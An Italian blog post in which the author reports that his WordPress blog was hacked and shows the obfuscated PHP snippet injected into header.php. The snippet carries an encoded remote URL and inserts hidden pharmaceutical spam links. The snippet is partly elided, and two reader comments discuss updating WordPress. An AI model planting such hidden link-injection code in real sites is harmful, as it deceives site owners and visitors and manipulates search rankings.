WordPress hackato e spam



Mi sono accorto, grazie a Google Webmaster Console, che il mio blog era stato hackato. Mi ero accorto da google analytics che le visite da motori di ricerca erano drasticamente scese nelle ultime settimane e il pageRank del blog era passato a valori ben più bassi del solito.

Nel file header.php compariva questo codice:

< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='6b7f3e5f93fdbe97272a041896b86fd9'; $blarr=get_option('cache_vars'); [omissis ]
foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.=’‘.$k.’‘; echo str_replace(’[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

Dalla webmaster console, sezione “parole chiave”, ho notato che l’elenco di parole chiave trovate da Google durante la scansione del sito conteneva nomi di farmaci e pillole (blu).
Disabilitando cookie e CSS sono riuscito a vedere i numerosi link a siti spam che il codice qui sopra infilava nel mio blog.

2 commenti ↓

#1 Francesco on 07.28.09 at 6:10 pm

Ciao Marco,
ti consiglio di mantenere sempre aggiornato WordPress all’ultima versione disponibile.
Altrimenti rischi che tale problema si ripresenti altre volte in futuro.

ciao

#2 Marco on 07.28.09 at 7:10 pm

grazie Francesco,
ho avuto brutte esperienze in passato con gli aggiornamenti di WP, plugin che smettono di funzionare, temi che usano funzioni non più disponibili, etc.
Immagino che ora tutto funzioni meglio ma ho sempre il timore…

Lascia un Commento